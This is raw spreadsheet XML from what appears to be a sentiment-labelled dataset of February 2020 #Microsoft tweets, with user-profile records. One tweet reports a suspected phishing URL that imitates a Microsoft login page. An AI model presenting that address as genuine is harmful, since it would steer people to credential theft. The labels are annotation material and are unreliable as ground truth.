    <t>{'id': 28390115, 'id_str': '28390115', 'name': 'Teddy Tedd Whiting', 'screen_name': 'Teddytedd', 'location': 'ÃœT: 40.89195,-74.043304', 'description': '1/2 of legendary Awesome 2 (WHBI, Sirius XM radio) Nice n Smooth DJ/ producer marketing branding, promotions, bookings etc awesomeentertainmentagency@gmail.com', 'url': 'https://t.co/qmAewkXC90', 'entities': {'url': {'urls': [{'url': 'https://t.co/qmAewkXC90', 'expanded_url': 'http://www.instagram.com/theoohchild', 'display_url': 'instagram.com/theoohchild', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3841, 'friends_count': 3740, 'listed_count': 44, 'created_at': 'Thu Apr 02 18:27:17 +0000 2009', 'favourites_count': 204, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1536,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'http://pbs.twimg.com/profile_images/679421864272404480/TSok6Opd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/679421864272404480/TSok6Opd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28390115/1453923459', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Wed Feb 26 01:35:02 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 01:34:02 +0000 2020</t>
  </si>
  <si>
    <t>The #future of .Net is coming in 2020: .NET 5, The Next Phase of #Microsoft .NET Framework!
https://t.co/hk5UB3sdkG
#dotnetcore #dotnetframework #softwaredeveloper #software #technews https://t.co/KHh2sKEwmv</t>
  </si>
  <si>
    <t>Wed Feb 26 01:29:22 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> https://login.xn--microoftonline-u9l.com.mekongtinphat.com
Suspected #phishing #opendir
AS45544 [112.213.89.73]
cPanel, Inc. Certification Authority
Keywords: #login #online #microsoft
https://t.co/zEz8nvKNr5</t>
  </si>
  <si>
    <t>Wed Feb 26 01:17:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #SharePoint Deserialization #Remote Code Execution https://t.co/fphdaoYl0f #CXSECurity via @SecurityNewsbot</t>
  </si>
  <si>
    <t>{'id': 149109780, 'id_str': '149109780', 'name': 'Cyber Security Daily News', 'screen_name': 'CyberSecDN', 'location': '', 'description': 'Tweeting about #CyberSecurity, #CyberDefense, #DevSecOps, #DFIR, #Forensics, #IncidentResponse, #Privacy, #Pentesting, and sharing daily #InfoSec news.', 'url': 'https://t.co/xkxH2NDlA2', 'entities': {'url': {'urls': [{'url': 'https://t.co/xkxH2NDlA2', 'expanded_url': 'https://www.patreon.com/CyberSecDN', 'display_url': 'patreon.com/CyberSecDN', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5622, 'friends_count': 144, 'listed_count': 951, 'created_at': 'Fri May 28 12:51:15 +0000 2010', 'favourites_count': 786, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 121648,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'http://pbs.twimg.com/profile_images/808492768372748292/rXVdyLWJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/808492768372748292/rXVdyLWJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/149109780/1453963796',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</si>
  <si>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Wed Feb 26 01:15:14 +0000 2020</t>
  </si>
  <si>
    <t>AlpsLogic IT Solutions has experience &amp;amp; expertise in a broad range of Microsoft technologies and languages  #USA #Canada #hustle #business #entrepreneur #motivation #remote #nomad #angular #Azure #SharePoint #Dotnet #MVC #Microsoft #Technologies https://t.co/IZvj2AlupH</t>
  </si>
  <si>
    <t>Wed Feb 26 01:11:49 +0000 2020</t>
  </si>
  <si>
    <t>Why do governments assume that the website model of the past 20 years will continue in the future? Now is the time for governments to look beyond the website horizon to redesigning servicing in the age of the exponentials. #microsoft https://t.co/qrVinuuZJs https://t.co/xH8pEE70kW</t>
  </si>
  <si>
    <t>Wed Feb 26 01:07:28 +0000 2020</t>
  </si>
  <si>
    <t>Future Decoded Tech Summit: Here are the five startups showcased at #Microsoft event 
#technews #startups
https://t.co/9k6K64xWoj</t>
  </si>
  <si>
    <t>Wed Feb 26 01:05:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are scaring consumers over #Edge #extensions, and for what? https://t.co/Hr4yKUfT40 via @pcworld</t>
  </si>
  <si>
    <t>Wed Feb 26 01:03:58 +0000 2020</t>
  </si>
  <si>
    <t>When providing public services, #efficiency can make or break the public's trust in your organization. Subscribe now to learn how you can enable trust-building actions with #Microsoft. https://t.co/HLggqac6wK</t>
  </si>
  <si>
    <t>Wed Feb 26 00:57:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launches #Office #MobileApp and promises new features to simplify smartphone tasks
#IntegratedMarketingPlatform #Canada #UnitedStates https://t.co/QJu0Z3HJVT</t>
  </si>
  <si>
    <t>Wed Feb 26 00:56:59 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OFFICIALLY Reveals DETAILED SPECS Of The Xbox Series X! https://t.co/rPI1nML9mh via @YouTube #Microsoft #XboxSeriesX #XboxOne</t>
  </si>
  <si>
    <t>{'id': 1730499012, 'id_str': '1730499012', 'name': 'Richard Masucci', 'screen_name': 'THEREALRTU', 'location': 'United States', 'description': 'YouTube, Cucumbers, flip-flopping', 'url': 'https://t.co/cqJ50skzWp', 'entities': {'url': {'urls': [{'url': 'https://t.co/cqJ50skzWp', 'expanded_url': 'http://www.youtube.com/reviewtechusa', 'display_url': 'youtube.com/reviewtechusa', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48811, 'friends_count': 1137, 'listed_count': 183, 'created_at': 'Thu Sep 05 02:16:08 +0000 2013', 'favourites_count': 8904, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13850,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'http://pbs.twimg.com/profile_images/1215826940063633410/_ps-9Jws_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215826940063633410/_ps-9Jws_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1730499012/1578710834',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</si>
  <si>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00:31:56 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft Cloud and #Microsoft365, Dyrand Systems can help you assess and manage compliance risk, protect sensitive data and respond efficiently to data discovery requests. Subscribe now to stay informed! https://t.co/39PwwjE2po</t>
  </si>
  <si>
    <t>Wed Feb 26 00:21:02 +0000 2020</t>
  </si>
  <si>
    <t>Angelina Jolie teams up with #Microsoft and the #BBC to give children high-quality journalism https://t.co/ESiwrYPycu https://t.co/je2b879b80</t>
  </si>
  <si>
    <t>{'id': 944988434476568581, 'id_str': '944988434476568581', 'name': 'Women in Emerging Tech', 'screen_name': 'Women_in_eTech', 'location': 'Vancouver, British Columbia', 'description': 'Empowering Women in The New World of Decentralized Innovation and Emerging Technology | Community Events, Hackathons, and Educational Workshops.', 'url': 'https://t.co/1MUFCqGFPN', 'entities': {'url': {'urls': [{'url': 'https://t.co/1MUFCqGFPN', 'expanded_url': 'http://womeninemergingtech.com', 'display_url': 'womeninemergingtech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 246, 'listed_count': 2, 'created_at': 'Sun Dec 24 17:49:34 +0000 2017', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 651,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'http://pbs.twimg.com/profile_images/1183556557465718785/f-qiZe2D_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183556557465718785/f-qiZe2D_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/944988434476568581/1571016848',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</si>
  <si>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Wed Feb 26 00:18:51 +0000 2020</t>
  </si>
  <si>
    <t>Looking forward to reading this. Thanks for the recommendation @SeamusBlackley 
#xbox #scifi #microsoft #originalxbox #xbox #xboxhistory https://t.co/FFjrhkllZN</t>
  </si>
  <si>
    <t>{'id': 1054638696278806528, 'id_str': '1054638696278806528', 'name': 'Xbox Darkroom', 'screen_name': 'XboxDarkRoom', 'location': 'San Francisco, CA', 'description': 'Follow me as I uncover the buried artifacts and history of one of the greatest consoles of all time.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 86, 'listed_count': 0, 'created_at': 'Tue Oct 23 07:40:34 +0000 2018', 'favourites_count': 145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231885067711967232/pIt5WZHH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231885067711967232/pIt5WZHH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1054638696278806528/1579509707',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</si>
  <si>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Wed Feb 26 00:13:57 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Games With Gold March 2020 Announced https://t.co/rXDUZcm8vs #Microsoft #Xbox #XboxOne</t>
  </si>
  <si>
    <t>Wed Feb 26 00:11:43 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact Amaral Group, LLC to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/71VSE3222T</t>
  </si>
  <si>
    <t>Very Positive</t>
  </si>
  <si>
    <t>Positive</t>
  </si>
  <si>
    <t>Neutral</t>
  </si>
  <si>
    <t>Negative</t>
  </si>
  <si>
    <t>Very Negative</t>
  </si>
  <si>
    <t>Irrelevant</t>
  </si>
  <si>
    <t>created_at</t>
  </si>
  <si>
    <t>tweet_id</t>
  </si>
  <si>
    <t>lang</t>
  </si>
  <si>
    <t>text</t>
  </si>
  <si>
    <t>user_info</t>
  </si>
  <si>
    <t>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</si>
</sst>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414"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A487" zoomScale="120" zoomScaleNormal="120" workbookViewId="0">
      <selection activeCell="D472" sqref="D472"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:6" s="2" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
      <c r="A1" s="1" t="s">
        <v>22565</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>22566</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>22567</v>
      </c>
      <c r="D1" t="s">
        <v>22568</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>22569</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>22570</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2">
        <v>1.2358882542490199E+18</v>
      </c>
      <c r="B2" t="s">
        <v>0</v>
      </c>
      <c r="C2" t="s">
        <v>1</v>
      </c>
      <c r="D2" t="s">
        <v>2</v>
      </c>
      <c r="E2" t="s">
        <v>3</v>
      </c>
      <c r="F2" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3">
        <v>1.2358866990724101E+18</v>
      </c>
      <c r="B3" t="s">
        <v>4</v>
      </c>
      <c r="C3" t="s">
        <v>1</v>
      </c>
      <c r="D3" t="s">
        <v>5</v>
      </c>
      <c r="E3" t="s">
        <v>6</v>
      </c>
      <c r="F3" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4">
        <v>1.2358865333219E+18</v>
      </c>
      <c r="B4" t="s">
        <v>7</v>
      </c>
      <c r="C4" t="s">
        <v>1</v>
      </c>
      <c r="D4" t="s">
        <v>8</v>
      </c>
      <c r="E4" t="s">
        <v>9</v>
      </c>
      <c r="F4" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5">
        <v>1.2358858385898099E+18</v>
      </c>
      <c r="B5" t="s">
        <v>10</v>
      </c>
      <c r="C5" t="s">
        <v>1</v>
      </c>
      <c r="D5" t="s">
        <v>11</v>
      </c>
      <c r="E5" t="s">
        <v>12</v>
      </c>
      <c r="F5" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6">
        <v>1.23588575113869E+18</v>
      </c>
      <c r="B6" t="s">
        <v>13</v>
      </c>
      <c r="C6" t="s">
        <v>1</v>
      </c>
      <c r="D6" t="s">
        <v>14</v>
      </c>
      <c r="E6" t="s">
        <v>15</v>
      </c>
      <c r="F6" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7">
        <v>1.23588538419568E+18</v>
      </c>
      <c r="B7" t="s">
        <v>16</v>
      </c>
      <c r="C7" t="s">
        <v>1</v>
      </c>
      <c r="D7" t="s">
        <v>17</v>
      </c>
      <c r="E7" t="s">
        <v>18</v>
      </c>
      <c r="F7" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8">
        <v>1.23588478730865E+18</v>
      </c>
      <c r="B8" t="s">
        <v>19</v>
      </c>
      <c r="C8" t="s">
        <v>1</v>
      </c>
      <c r="D8" t="s">
        <v>20</v>
      </c>
      <c r="E8" t="s">
        <v>21</v>
      </c>
      <c r="F8" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9">
        <v>1.2358834456892401E+18</v>
      </c>
      <c r="B9" t="s">
        <v>22</v>
      </c>
      <c r="C9" t="s">
        <v>1</v>
      </c>
      <c r="D9" t="s">
        <v>23</v>
      </c>
      <c r="E9" t="s">
        <v>24</v>
      </c>
      <c r="F9" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10">
        <v>1.23588315900848E+18</v>
      </c>
      <c r="B10" t="s">
        <v>25</v>
      </c>
      <c r="C10" t="s">
        <v>1</v>
      </c>
      <c r="D10" t="s">
        <v>26</v>
      </c>
      <c r="E10" t="s">
        <v>27</v>
      </c>
      <c r="F10" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11">
        <v>1.23588308123774E+18</v>
      </c>
      <c r="B11" t="s">
        <v>28</v>
      </c>
      <c r="C11" t="s">
        <v>1</v>
      </c>
      <c r="D11" t="s">
        <v>29</v>
      </c>
      <c r="E11" t="s">
        <v>30</v>
      </c>
      <c r="F11" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12">
        <v>1.23588306133149E+18</v>
      </c>
      <c r="B12" t="s">
        <v>31</v>
      </c>
      <c r="C12" t="s">
        <v>1</v>
      </c>
      <c r="D12" t="s">
        <v>32</v>
      </c>
      <c r="E12" t="s">
        <v>33</v>
      </c>
      <c r="F12" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13">
        <v>1.2358830128789701E+18</v>
      </c>
      <c r="B13" t="s">
        <v>34</v>
      </c>
      <c r="C13" t="s">
        <v>1</v>
      </c>
      <c r="D13" t="s">
        <v>35</v>
      </c>
      <c r="E13" t="s">
        <v>36</v>
      </c>
      <c r="F13" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14">
        <v>1.23588284833218E+18</v>
      </c>
      <c r="B14" t="s">
        <v>37</v>
      </c>
      <c r="C14" t="s">
        <v>1</v>
      </c>
      <c r="D14" t="s">
        <v>38</v>
      </c>
      <c r="E14" t="s">
        <v>39</v>
      </c>
      <c r="F14" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15">
        <v>1.2358816902176399E+18</v>
      </c>
      <c r="B15" t="s">
        <v>40</v>
      </c>
      <c r="C15" t="s">
        <v>1</v>
      </c>
      <c r="D15" t="s">
        <v>41</v>
      </c>
      <c r="E15" t="s">
        <v>42</v>
      </c>
      <c r="F15" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16">
        <v>1.2358810732146601E+18</v>
      </c>
      <c r="B16" t="s">
        <v>43</v>
      </c>
      <c r="C16" t="s">
        <v>1</v>
      </c>
      <c r="D16" t="s">
        <v>44</v>
      </c>
      <c r="E16" t="s">
        <v>45</v>
      </c>
      <c r="F16" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17">
        <v>1.23587934977503E+18</v>
      </c>
      <c r="B17" t="s">
        <v>46</v>
      </c>
      <c r="C17" t="s">
        <v>1</v>
      </c>
      <c r="D17" t="s">
        <v>47</v>
      </c>
      <c r="E17" t="s">
        <v>48</v>
      </c>
      <c r="F17" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18">
        <v>1.23587897598722E+18</v>
      </c>
      <c r="B18" t="s">
        <v>49</v>
      </c>
      <c r="C18" t="s">
        <v>1</v>
      </c>
      <c r="D18" t="s">
        <v>50</v>
      </c>
      <c r="E18" t="s">
        <v>51</v>
      </c>
      <c r="F18" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19">
        <v>1.2358789256765399E+18</v>
      </c>
      <c r="B19" t="s">
        <v>52</v>
      </c>
      <c r="C19" t="s">
        <v>1</v>
      </c>
      <c r="D19" t="s">
        <v>53</v>
      </c>
      <c r="E19" t="s">
        <v>54</v>
      </c>
      <c r="F19" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20">
        <v>1.2358788493106801E+18</v>
      </c>
      <c r="B20" t="s">
        <v>55</v>
      </c>
      <c r="C20" t="s">
        <v>1</v>
      </c>
      <c r="D20" t="s">
        <v>56</v>
      </c>
      <c r="E20" t="s">
        <v>57</v>
      </c>
      <c r="F20" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21">
        <v>1.2358783508387799E+18</v>
      </c>
      <c r="B21" t="s">
        <v>58</v>
      </c>
      <c r="C21" t="s">
        <v>1</v>
      </c>
      <c r="D21" t="s">
        <v>59</v>
      </c>
      <c r="E21" t="s">
        <v>60</v>
      </c>
      <c r="F21" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22">
        <v>1.2358780583194299E+18</v>
      </c>
      <c r="B22" t="s">
        <v>61</v>
      </c>
      <c r="C22" t="s">
        <v>1</v>
      </c>
      <c r="D22" t="s">
        <v>62</v>
      </c>
      <c r="E22" t="s">
        <v>63</v>
      </c>
      <c r="F22" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23">
        <v>1.2358776253163E+18</v>
      </c>
      <c r="B23" t="s">
        <v>64</v>
      </c>
      <c r="C23" t="s">
        <v>1</v>
      </c>
      <c r="D23" t="s">
        <v>65</v>
      </c>
      <c r="E23" t="s">
        <v>66</v>
      </c>
      <c r="F23" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24">
        <v>1.2358768621419E+18</v>
      </c>
      <c r="B24" t="s">
        <v>67</v>
      </c>
      <c r="C24" t="s">
        <v>1</v>
      </c>
      <c r="D24" t="s">
        <v>68</v>
      </c>
      <c r="E24" t="s">
        <v>69</v>
      </c>
      <c r="F24" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25">
        <v>1.23587610026317E+18</v>
      </c>
      <c r="B25" t="s">
        <v>70</v>
      </c>
      <c r="C25" t="s">
        <v>1</v>
      </c>
      <c r="D25" t="s">
        <v>71</v>
      </c>
      <c r="E25" t="s">
        <v>72</v>
      </c>
      <c r="F25" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26">
        <v>1.2358758358795899E+18</v>
      </c>
      <c r="B26" t="s">
        <v>73</v>
      </c>
      <c r="C26" t="s">
        <v>1</v>
      </c>
      <c r="D26" t="s">
        <v>74</v>
      </c>
      <c r="E26" t="s">
        <v>75</v>
      </c>
      <c r="F26" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27">
        <v>1.23587581504223E+18</v>
      </c>
      <c r="B27" t="s">
        <v>76</v>
      </c>
      <c r="C27" t="s">
        <v>1</v>
      </c>
      <c r="D27" t="s">
        <v>77</v>
      </c>
      <c r="E27" t="s">
        <v>78</v>
      </c>
      <c r="F27" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28">
        <v>1.2358753620698199E+18</v>
      </c>
      <c r="B28" t="s">
        <v>79</v>
      </c>
      <c r="C28" t="s">
        <v>1</v>
      </c>
      <c r="D28" t="s">
        <v>80</v>
      </c>
      <c r="E28" t="s">
        <v>81</v>
      </c>
      <c r="F28" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29">
        <v>1.23587530468766E+18</v>
      </c>
      <c r="B29" t="s">
        <v>82</v>
      </c>
      <c r="C29" t="s">
        <v>1</v>
      </c>
      <c r="D29" t="s">
        <v>83</v>
      </c>
      <c r="E29" t="s">
        <v>84</v>
      </c>
      <c r="F29" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30">
        <v>1.2358744059365E+18</v>
      </c>
      <c r="B30" t="s">
        <v>85</v>
      </c>
      <c r="C30" t="s">
        <v>1</v>
      </c>
      <c r="D30" t="s">
        <v>86</v>
      </c>
      <c r="E30" t="s">
        <v>87</v>
      </c>
      <c r="F30" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A31">
        <v>1.2358742775234601E+18</v>
      </c>
      <c r="B31" t="s">
        <v>88</v>
      </c>
      <c r="C31" t="s">
        <v>1</v>
      </c>
      <c r="D31" t="s">
        <v>89</v>
      </c>
      <c r="E31" t="s">
        <v>90</v>
      </c>
      <c r="F31" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A32">
        <v>1.2358741802451899E+18</v>
      </c>
      <c r="B32" t="s">
        <v>91</v>
      </c>
      <c r="C32" t="s">
        <v>1</v>
      </c>
      <c r="D32" t="s">
        <v>92</v>
      </c>
      <c r="E32" t="s">
        <v>93</v>
      </c>
      <c r="F32" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A33">
        <v>1.23587404166113E+18</v>
      </c>
      <c r="B33" t="s">
        <v>94</v>
      </c>
      <c r="C33" t="s">
        <v>1</v>
      </c>
      <c r="D33" t="s">
        <v>95</v>
      </c>
      <c r="E33" t="s">
        <v>96</v>
      </c>
      <c r="F33" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A34">
        <v>1.23587401356349E+18</v>
      </c>
      <c r="B34" t="s">
        <v>97</v>
      </c>
      <c r="C34" t="s">
        <v>1</v>
      </c>
      <c r="D34" t="s">
        <v>98</v>
      </c>
      <c r="E34" t="s">
        <v>99</v>
      </c>
      <c r="F34" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A35">
        <v>1.2358735430254899E+18</v>
      </c>
      <c r="B35" t="s">
        <v>100</v>
      </c>
      <c r="C35" t="s">
        <v>1</v>
      </c>
      <c r="D35" t="s">
        <v>101</v>
      </c>
      <c r="E35" t="s">
        <v>102</v>
      </c>
      <c r="F35" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A36">
        <v>1.23587276955378E+18</v>
      </c>
      <c r="B36" t="s">
        <v>103</v>
      </c>
      <c r="C36" t="s">
        <v>1</v>
      </c>
      <c r="D36" t="s">
        <v>104</v>
      </c>
      <c r="E36" t="s">
        <v>105</v>
      </c>
      <c r="F36" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A37">
        <v>1.2358709258509399E+18</v>
      </c>
      <c r="B37" t="s">
        <v>106</v>
      </c>
      <c r="C37" t="s">
        <v>1</v>
      </c>
      <c r="D37" t="s">
        <v>107</v>
      </c>
      <c r="E37" t="s">
        <v>108</v>
      </c>
      <c r="F37" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A38">
        <v>1.23587064690881E+18</v>
      </c>
      <c r="B38" t="s">
        <v>109</v>
      </c>
      <c r="C38" t="s">
        <v>1</v>
      </c>
      <c r="D38" t="s">
        <v>110</v>
      </c>
      <c r="E38" t="s">
        <v>111</v>
      </c>
      <c r="F38" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A39">
        <v>1.23586977617549E+18</v>
      </c>
      <c r="B39" t="s">
        <v>112</v>
      </c>
      <c r="C39" t="s">
        <v>1</v>
      </c>
      <c r="D39" t="s">
        <v>113</v>
      </c>
      <c r="E39" t="s">
        <v>114</v>
      </c>
      <c r="F39" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A40">
        <v>1.23586942613985E+18</v>
      </c>
      <c r="B40" t="s">
        <v>115</v>
      </c>
      <c r="C40" t="s">
        <v>1</v>
      </c>
      <c r="D40" t="s">
        <v>116</v>
      </c>
      <c r="E40" t="s">
        <v>117</v>
      </c>
      <c r="F40" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A41">
        <v>1.2358688740058601E+18</v>
      </c>
      <c r="B41" t="s">
        <v>118</v>
      </c>
      <c r="C41" t="s">
        <v>1</v>
      </c>
      <c r="D41" t="s">
        <v>119</v>
      </c>
      <c r="E41" t="s">
        <v>120</v>
      </c>
      <c r="F41" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A42">
        <v>1.2358686050083699E+18</v>
      </c>
      <c r="B42" t="s">
        <v>121</v>
      </c>
      <c r="C42" t="s">
        <v>1</v>
      </c>
      <c r="D42" t="s">
        <v>122</v>
      </c>
      <c r="E42" t="s">
        <v>123</v>
      </c>
      <c r="F42" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A43">
        <v>1.2358684866409201E+18</v>
      </c>
      <c r="B43" t="s">
        <v>124</v>
      </c>
      <c r="C43" t="s">
        <v>1</v>
      </c>
      <c r="D43" t="s">
        <v>125</v>
      </c>
      <c r="E43" t="s">
        <v>126</v>
      </c>
      <c r="F43" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A44">
        <v>1.23586790777664E+18</v>
      </c>
      <c r="B44" t="s">
        <v>127</v>
      </c>
      <c r="C44" t="s">
        <v>1</v>
      </c>
      <c r="D44" t="s">
        <v>128</v>
      </c>
      <c r="E44" t="s">
        <v>129</v>
      </c>
      <c r="F44" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A45">
        <v>1.23586784148142E+18</v>
      </c>
      <c r="B45" t="s">
        <v>130</v>
      </c>
      <c r="C45" t="s">
        <v>1</v>
      </c>
      <c r="D45" t="s">
        <v>131</v>
      </c>
      <c r="E45" t="s">
        <v>132</v>
      </c>
      <c r="F45" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A46">
        <v>1.23586776348832E+18</v>
      </c>
      <c r="B46" t="s">
        <v>133</v>
      </c>
      <c r="C46" t="s">
        <v>1</v>
      </c>
      <c r="D46" t="s">
        <v>134</v>
      </c>
      <c r="E46" t="s">
        <v>135</v>
      </c>
      <c r="F46" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A47">
        <v>1.23586727572018E+18</v>
      </c>
      <c r="B47" t="s">
        <v>136</v>
      </c>
      <c r="C47" t="s">
        <v>1</v>
      </c>
      <c r="D47" t="s">
        <v>137</v>
      </c>
      <c r="E47" t="s">
        <v>138</v>
      </c>
      <c r="F47" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A48">
        <v>1.2358655165661599E+18</v>
      </c>
      <c r="B48" t="s">
        <v>139</v>
      </c>
      <c r="C48" t="s">
        <v>1</v>
      </c>
      <c r="D48" t="s">
        <v>140</v>
      </c>
      <c r="E48" t="s">
        <v>141</v>
      </c>
      <c r="F48" t="s">
        <v>22562</v>
      </c>
